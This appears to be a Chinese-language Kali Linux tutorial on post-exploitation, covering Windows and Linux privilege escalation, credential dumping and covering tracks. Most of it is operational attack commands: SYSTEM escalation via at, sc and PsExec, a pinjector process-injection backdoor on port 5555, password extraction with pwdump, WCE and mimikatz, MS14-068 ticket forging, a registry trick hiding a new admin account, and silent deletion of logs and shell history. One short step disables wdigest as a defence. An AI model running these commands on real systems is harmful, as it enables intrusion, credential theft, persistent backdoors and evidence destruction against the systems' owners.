Kali实战-提权
本地提权
windows默认账号
user
Administrator
System #最高权限
关系图示:
Linux默认账号
User
Root
ADMIN提权为SYSTEM
思路:利用windows中以system运行的程序进行操作,将系统提权
win xp、win2003
- at 18:12(时间) /interactive cmd #以system身份启动cmd
- 启动taskmgr服务
- 杀掉explorer.exe进程(桌面)
- 新建explorer.exe进程
win7,win8
- sc Create syscmd binPath- “cmd /K start” type- own type- interact #创建syscmd系统服务
- sc start syscmd #启动服务
使用工具
Sysinternals Suite中的PsExec程序
PsExec.exe -i -s cmd注入进程提权
工具 - pinjector.exe
(相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现)
pinjector.exe -p 656(pid) cmd 5555(端口)
#将pinjector.exe注入到656这个进程下,当外部连接5555端口时,系统会将cmd提交出去抓包嗅探工具
Windows
- Wireshark
- Omnipeek
- commview
- Sniffpass(只抓密码相关的数据包)
Linux
- Tcpdump
- Wireshark
- Dsniff(只抓密码相关的数据包)
本地缓存密码
浏览器缓存的密码
• IE浏览器
• Firefox
网络密码
win7,win8
控制面板->用户账户和家庭安全->凭据管理器
无线密码
http://www.nirsoft.net
Dump SAM
• Pwdump (不稳定)
• /usr/share/windows-binaries/fgdump/
输入Pwdump.exe localhost生成文件,使用ophcrack点击crack
注意:
windows密码以:分为两段加密lmhash:ntmhash
windows其实不知道你输入的密码,只会保存密文格式,计算哈希值检查输入是否正确
windows身份认证
LSA本地安全助手
传输过程都是密文,身份验证使用NTML协议
不同环境有不同安全包进行身份验证处理
例外:wdigest 会缓存明文密码,关机后才销毁
WCE(WINDOWS CREDENTIAL EDITOR)
windows身份验证编辑器——-可以查看当前登录用户
存放路径/usr/share/wce/
wce-universal.exe -lv #通用版本 列出详细信息
wce-universal.exe -d #删除
wce-universal.exe -g password #计算密码hash
wce-universal.exe -w #读取密码
net user +用户名 #查看用户详细信息,所在组
wce-universal.exe -i LUID -s 密码 #修改LUID的用户密码如何防护WCE攻击?
- 打开注册表编辑器,进入HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
- 双击右侧Security Packages
- 删除下面两个字符
tspkg,wdigest
注意: 一定要把空行也删掉,不然注册表会报错重启
tspkg #维护远程相关的明文密码
wdigest#维护明文密码
其他提权工具
fgdump 双击即可
mimikatz
mimikatz是由C语言编写的开源小工具,功能非常强大。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证,以及pass-the-hash、pass-the-ticket、build Golden tickets等数种黑客技术。
提取Windows系统的明文密码:
1. mimikatz.exe
2. privilege::debug #提升权限
3. sekurlsa::logonPasswords其他命令:
:: #帮助信息 -h,?无效
event::clear #清除日志
event::drop #不再产生新日志
misc::cmd #启动cmd等服务
misc::wifi #查看电脑中存的wifi密码
token::whoami #查看当前用户
token::list #列出所有用户利用漏洞提权
找漏洞利用代码
searchsploit ms11-080(漏洞)将python转换成exe的工具
- pyinstaller
- pywin32
将漏洞利用代码文件(18176.py)放到pyinstaller文件夹下,pyinstaller文件夹放到python27文件夹下,
..\python.exe pyinstaller.py --onefile 18176.py运行即可提权system
取得域的管理员权限
搭建域环境:
域控制器只能是server的操作系统,win7,8,xp不可以
作为域控制器的server管理员账号在升级成域后自动提升为域管理员
server要设为静态ip
DNS要指向自己的ip
运行->输入dcpromo(域安装程序)
域控制器也作为dns服务器
将电脑加入域:
我的电脑->属性->计算机名称->更改
运行->输入dsa.msc(域管理工具)
(MS14-068)漏洞利用
1.生成shell
python 1876.py -u user@lab.com -s userSID -d 域控制器的ip
#user是域用户名,userSID是这个用户的SID(用whoami.exe /all可查看)2.将minikatz和生成的文件[email protected] 拷贝到win7系统(目标机)
3.本地管理员登陆
mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit4.成功
利用配置不当提权
icacls 查看程序权限
icacls c:\windows\*.exe /save perm /T
#perm是保存的文件名
#查看windows下权限不当的程序,如(FA;;;BU)即为普通用户有全部权限将shell拷贝到程序目录下,伪装成正常程序的名字
基本信息收集
应用系统的配置文件
- 应用连接数据库的配置文件
- 后台服务运行账号
Linux
• /etc/resolv.conf
• /etc/passwd
• /etc/shadow #用户密码
• whoami and who –a #当前用户信息
• ifconfig -a, iptables -L -n, netstat –r #配置,防火墙,网段信息
• uname –a, ps aux #查看补丁,内核信息
• dpkg -l| head #列出所有软件包Windows
• ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r #所有网络配置参数,dns缓存,路由信息
• net view , net view /domain #共享信息
• net user /domain, net user %username% /domain #域的信息
• net accounts, net share #当前开了哪些共享
• net localgroup administrators username /add #将username用户加入管理员权限
• net group "Domain Controllers" /domain #查看域控制器中的账号
• net share name$=C:\ /unlimited #设置c盘根目录共享
• net user username /active:yes /domain #激活用户(域中)WMIC(windows管理框架)
• wmic nicconfig get ipaddress,macaddress #读取ip,mac地址
• wmic computersystemget username #查看当前登录账号名称
• wmic netlogin get name,lastlogon #查看用户登录记录
• wmic process get caption, executablepath,commandline #查看当前运行进程
• wmic process where name="calc.exe" call terminate #中止calc.exe进程
• wmic os get name,servicepackmajorversion #提取系统servicepack版本
• wmic product get name,version #查看当前系统安装了哪些软件
• wmic product where name=“name” call uninstall /nointeractive #在后台删除name程序
• wmic share get /ALL #查看共享文件夹
• wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections"1" #开启远程桌面
• wmic nteventlogget path,filename, writeable #查看当前系统日志敏感数据
Linux
• /etc ;/usr/local/etc #敏感配置路径
• /etc/passwd ;/etc/shadow #账号密码
• .ssh ;.gnupg #公私钥
• The e-mail and data files
• 业务数据库 ;身份认证服务器数据库
• /tmpwindows
• SAM 数据库 ; 注册表文件
• %SYSTEMROOT%\repair\SAM
•%SYSTEMROOT%\System32\config\RegBack\SAM
• 业务数据库 ; 身份认证数据库
• 临时文件目录
•UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\隐藏痕迹
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0
#禁止在登陆界面显示新建账号del %WINDIR%\*.log /a/s/q/f #静默删除日志
history -c #删除历史记录linux中日志
- auth.log / secure
- btmp / wtmp
- lastlog / faillog
- 其他日志和 HIDS 等
- linux中给文件加-i属性后无法操作